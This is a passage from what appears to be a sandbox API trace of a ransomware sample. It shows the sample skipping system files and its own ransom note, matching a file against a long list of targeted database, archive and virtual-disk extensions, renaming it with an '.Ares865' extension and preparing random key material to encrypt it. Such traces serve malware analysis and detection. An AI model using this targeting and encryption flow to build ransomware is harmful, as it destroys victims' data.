ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="aoldtz.exe") returned 1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2=".") returned 1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="..") returned 1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="windows") returned -1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="bootmgr") returned 1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="temp") returned -1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="pagefile.sys") returned -1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="boot") returned 1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="ids.txt") returned 1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="ntuser.dat") returned -1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="perflogs") returned -1 [0089.357] lstrcmpiW (lpString1="netfol.ico", lpString2="MSBuild") returned 1 [0089.357] lstrlenW (lpString="netfol.ico") returned 10 [0089.357] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 96 [0089.357] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="netfol.ico" | out: lpString1="netfol.ico") returned="netfol.ico" [0089.358] lstrlenW (lpString="netfol.ico") returned 10 [0089.358] lstrlenW (lpString="Ares865") returned 7 [0089.358] lstrcmpiW (lpString1="fol.ico", lpString2="Ares865") returned 1 [0089.358] lstrlenW (lpString=".dll") returned 4 [0089.358] lstrcmpiW (lpString1="netfol.ico", lpString2=".dll") returned 1 [0089.358] lstrlenW (lpString=".lnk") returned 4 [0089.358] lstrcmpiW (lpString1="netfol.ico", lpString2=".lnk") returned 1 [0089.358] lstrlenW (lpString=".ini") returned 4 [0089.358] lstrcmpiW (lpString1="netfol.ico", lpString2=".ini") returned 1 [0089.358] lstrlenW (lpString=".sys") returned 4 [0089.358] lstrcmpiW (lpString1="netfol.ico", lpString2=".sys") returned 1 [0089.358] lstrlenW (lpString="netfol.ico") returned 10 [0089.358] lstrlenW (lpString="bak") returned 3 [0089.358] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.358] lstrlenW (lpString="ba_") returned 3 [0089.358] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.358] lstrlenW (lpString="dbb") returned 3 [0089.358] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.358] lstrlenW (lpString="vmdk") returned 4 [0089.358] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.358] lstrlenW (lpString="rar") returned 3 [0089.358] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.358] lstrlenW (lpString="zip") returned 3 [0089.358] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.358] lstrlenW (lpString="tgz") returned 3 [0089.358] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.358] lstrlenW (lpString="vbox") returned 4 [0089.358] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.358] lstrlenW (lpString="vdi") returned 3 [0089.358] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.358] lstrlenW (lpString="vhd") returned 3 [0089.358] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.358] lstrlenW (lpString="vhdx") returned 4 [0089.358] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.358] lstrlenW (lpString="avhd") returned 4 [0089.358] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.358] lstrlenW (lpString="db") returned 2 [0089.358] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.359] lstrlenW (lpString="db2") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.359] lstrlenW (lpString="db3") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.359] lstrlenW (lpString="dbf") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.359] lstrlenW (lpString="mdf") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.359] lstrlenW (lpString="mdb") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.359] lstrlenW (lpString="sql") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.359] lstrlenW (lpString="sqlite") returned 6 [0089.359] lstrcmpiW (lpString1="ol.ico", lpString2="sqlite") returned -1 [0089.359] lstrlenW (lpString="sqlite3") returned 7 [0089.359] lstrcmpiW (lpString1="fol.ico", lpString2="sqlite3") returned -1 [0089.359] lstrlenW (lpString="sqlitedb") returned 8 [0089.359] lstrcmpiW (lpString1="tfol.ico", lpString2="sqlitedb") returned 1 [0089.359] lstrlenW (lpString="xml") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.359] lstrlenW (lpString="$er") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.359] lstrlenW (lpString="4dd") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.359] lstrlenW (lpString="4dl") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.359] lstrlenW (lpString="^^^") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.359] lstrlenW (lpString="abs") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.359] lstrlenW (lpString="abx") returned 3 [0089.359] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.359] lstrlenW (lpString="accdb") returned 5 [0089.359] lstrcmpiW (lpString1="l.ico", lpString2="accdb") returned 1 [0089.359] lstrlenW (lpString="accdc") returned 5 [0089.359] lstrcmpiW (lpString1="l.ico", lpString2="accdc") returned 1 [0089.359] lstrlenW (lpString="accde") returned 5 [0089.359] lstrcmpiW (lpString1="l.ico", lpString2="accde") returned 1 [0089.359] lstrlenW (lpString="accdr") returned 5 [0089.360] lstrcmpiW (lpString1="l.ico", lpString2="accdr") returned 1 [0089.360] lstrlenW (lpString="accdt") returned 5 [0089.360] lstrcmpiW (lpString1="l.ico", lpString2="accdt") returned 1 [0089.360] lstrlenW (lpString="accdw") returned 5 [0089.360] lstrcmpiW (lpString1="l.ico", lpString2="accdw") returned 1 [0089.360] lstrlenW (lpString="accft") returned 5 [0089.360] lstrcmpiW (lpString1="l.ico", lpString2="accft") returned 1 [0089.360] lstrlenW (lpString="adb") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.360] lstrlenW (lpString="adb") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.360] lstrlenW (lpString="ade") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.360] lstrlenW (lpString="adf") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.360] lstrlenW (lpString="adn") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.360] lstrlenW (lpString="adp") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.360] lstrlenW (lpString="alf") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.360] lstrlenW (lpString="ask") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.360] lstrlenW (lpString="btr") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.360] lstrlenW (lpString="cat") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.360] lstrlenW (lpString="cdb") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.360] lstrlenW (lpString="ckp") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.360] lstrlenW (lpString="cma") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.360] lstrlenW (lpString="cpd") returned 3 [0089.360] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.360] lstrlenW (lpString="dacpac") returned 6 [0089.360] lstrcmpiW (lpString1="ol.ico", lpString2="dacpac") returned 1 [0089.360] lstrlenW (lpString="dad") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.361] lstrlenW (lpString="dadiagrams") returned 10 [0089.361] lstrlenW (lpString="daschema") returned 8 [0089.361] lstrcmpiW (lpString1="tfol.ico", lpString2="daschema") returned 1 [0089.361] lstrlenW (lpString="db-journal") returned 10 [0089.361] lstrlenW (lpString="db-shm") returned 6 [0089.361] lstrcmpiW (lpString1="ol.ico", lpString2="db-shm") returned 1 [0089.361] lstrlenW (lpString="db-wal") returned 6 [0089.361] lstrcmpiW (lpString1="ol.ico", lpString2="db-wal") returned 1 [0089.361] lstrlenW (lpString="dbc") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.361] lstrlenW (lpString="dbs") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.361] lstrlenW (lpString="dbt") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.361] lstrlenW (lpString="dbv") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.361] lstrlenW (lpString="dbx") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.361] lstrlenW (lpString="dcb") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.361] lstrlenW (lpString="dct") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.361] lstrlenW (lpString="dcx") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.361] lstrlenW (lpString="ddl") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.361] lstrlenW (lpString="dlis") returned 4 [0089.361] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.361] lstrlenW (lpString="dp1") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.361] lstrlenW (lpString="dqy") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.361] lstrlenW (lpString="dsk") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.361] lstrlenW (lpString="dsn") returned 3 [0089.361] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.361] lstrlenW (lpString="dtsx") returned 4 [0089.361] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.362] lstrlenW (lpString="dxl") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.362] lstrlenW (lpString="eco") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.362] lstrlenW (lpString="ecx") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.362] lstrlenW (lpString="edb") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.362] lstrlenW (lpString="epim") returned 4 [0089.362] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.362] lstrlenW (lpString="fcd") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.362] lstrlenW (lpString="fdb") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.362] lstrlenW (lpString="fic") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.362] lstrlenW (lpString="flexolibrary") returned 12 [0089.362] lstrlenW (lpString="fm5") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.362] lstrlenW (lpString="fmp") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.362] lstrlenW (lpString="fmp12") returned 5 [0089.362] lstrcmpiW (lpString1="l.ico", lpString2="fmp12") returned 1 [0089.362] lstrlenW (lpString="fmpsl") returned 5 [0089.362] lstrcmpiW (lpString1="l.ico", lpString2="fmpsl") returned 1 [0089.362] lstrlenW (lpString="fol") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.362] lstrlenW (lpString="fp3") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.362] lstrlenW (lpString="fp4") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.362] lstrlenW (lpString="fp5") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.362] lstrlenW (lpString="fp7") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.362] lstrlenW (lpString="fpt") returned 3 [0089.362] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.362] lstrlenW (lpString="frm") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.363] lstrlenW (lpString="gdb") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.363] lstrlenW (lpString="gdb") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.363] lstrlenW (lpString="grdb") returned 4 [0089.363] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.363] lstrlenW (lpString="gwi") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.363] lstrlenW (lpString="hdb") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.363] lstrlenW (lpString="his") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.363] lstrlenW (lpString="ib") returned 2 [0089.363] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.363] lstrlenW (lpString="idb") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.363] lstrlenW (lpString="ihx") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.363] lstrlenW (lpString="itdb") returned 4 [0089.363] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.363] lstrlenW (lpString="itw") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.363] lstrlenW (lpString="jet") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.363] lstrlenW (lpString="jtx") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.363] lstrlenW (lpString="kdb") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.363] lstrlenW (lpString="kexi") returned 4 [0089.363] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.363] lstrlenW (lpString="kexic") returned 5 [0089.363] lstrcmpiW (lpString1="l.ico", lpString2="kexic") returned 1 [0089.363] lstrlenW (lpString="kexis") returned 5 [0089.363] lstrcmpiW (lpString1="l.ico", lpString2="kexis") returned 1 [0089.363] lstrlenW (lpString="lgc") returned 3 [0089.363] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.364] lstrlenW (lpString="lwx") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.364] lstrlenW (lpString="maf") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.364] lstrlenW (lpString="maq") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.364] lstrlenW (lpString="mar") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.364] lstrlenW (lpString="marshal") returned 7 [0089.364] lstrcmpiW (lpString1="fol.ico", lpString2="marshal") returned -1 [0089.364] lstrlenW (lpString="mas") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.364] lstrlenW (lpString="mav") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.364] lstrlenW (lpString="maw") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.364] lstrlenW (lpString="mdbhtml") returned 7 [0089.364] lstrcmpiW (lpString1="fol.ico", lpString2="mdbhtml") returned -1 [0089.364] lstrlenW (lpString="mdn") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.364] lstrlenW (lpString="mdt") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.364] lstrlenW (lpString="mfd") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.364] lstrlenW (lpString="mpd") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.364] lstrlenW (lpString="mrg") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.364] lstrlenW (lpString="mud") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.364] lstrlenW (lpString="mwb") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.364] lstrlenW (lpString="myd") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.364] lstrlenW (lpString="ndf") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.364] lstrlenW (lpString="nnt") returned 3 [0089.364] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.364] lstrlenW (lpString="nrmlib") returned 6 [0089.365] lstrcmpiW (lpString1="ol.ico", lpString2="nrmlib") returned 1 [0089.365] lstrlenW (lpString="ns2") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.365] lstrlenW (lpString="ns3") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.365] lstrlenW (lpString="ns4") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.365] lstrlenW (lpString="nsf") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.365] lstrlenW (lpString="nv") returned 2 [0089.365] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.365] lstrlenW (lpString="nv2") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.365] lstrlenW (lpString="nwdb") returned 4 [0089.365] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.365] lstrlenW (lpString="nyf") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.365] lstrlenW (lpString="odb") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.365] lstrlenW (lpString="odb") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.365] lstrlenW (lpString="oqy") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.365] lstrlenW (lpString="ora") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.365] lstrlenW (lpString="orx") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.365] lstrlenW (lpString="owc") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.365] lstrlenW (lpString="p96") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.365] lstrlenW (lpString="p97") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.365] lstrlenW (lpString="pan") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.365] lstrlenW (lpString="pdb") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.365] lstrlenW (lpString="pdm") returned 3 [0089.365] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.366] lstrlenW (lpString="pnz") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.366] lstrlenW (lpString="qry") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.366] lstrlenW (lpString="qvd") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.366] lstrlenW (lpString="rbf") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.366] lstrlenW (lpString="rctd") returned 4 [0089.366] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.366] lstrlenW (lpString="rod") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.366] lstrlenW (lpString="rodx") returned 4 [0089.366] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.366] lstrlenW (lpString="rpd") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.366] lstrlenW (lpString="rsd") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.366] lstrlenW (lpString="sas7bdat") returned 8 [0089.366] lstrcmpiW (lpString1="tfol.ico", lpString2="sas7bdat") returned 1 [0089.366] lstrlenW (lpString="sbf") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.366] lstrlenW (lpString="scx") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.366] lstrlenW (lpString="sdb") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.366] lstrlenW (lpString="sdc") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.366] lstrlenW (lpString="sdf") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.366] lstrlenW (lpString="sis") returned 3 [0089.366] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.366] lstrlenW (lpString="spq") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.367] lstrlenW (lpString="te") returned 2 [0089.367] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.367] lstrlenW (lpString="teacher") returned 7 [0089.367] lstrcmpiW (lpString1="fol.ico", lpString2="teacher") returned -1 [0089.367] lstrlenW (lpString="tmd") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.367] lstrlenW (lpString="tps") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.367] lstrlenW (lpString="trc") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.367] lstrlenW (lpString="trc") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.367] lstrlenW (lpString="trm") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.367] lstrlenW (lpString="udb") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.367] lstrlenW (lpString="udl") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.367] lstrlenW (lpString="usr") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.367] lstrlenW (lpString="v12") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.367] lstrlenW (lpString="vis") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.367] lstrlenW (lpString="vpd") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.367] lstrlenW (lpString="vvv") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.367] lstrlenW (lpString="wdb") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.367] lstrlenW (lpString="wmdb") returned 4 [0089.367] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.367] lstrlenW (lpString="wrk") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.367] lstrlenW (lpString="xdb") returned 3 [0089.367] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.368] lstrlenW (lpString="xld") returned 3 [0089.368] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.368] lstrlenW (lpString="xmlff") returned 5 [0089.368] lstrcmpiW (lpString1="l.ico", lpString2="xmlff") returned -1 [0089.368] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.Ares865") returned 104 [0089.368] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.ares865"), dwFlags=0x1) returned 1 [0089.369] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.369] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29422) returned 1 [0089.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.369] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.370] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.370] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.370] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x75f0, lpName=0x0) returned 0x15c [0089.371] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x75f0) returned 0x190000 [0089.373] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.374] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.374] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.375] HeapFree (in: hHeap=0x2b0000, 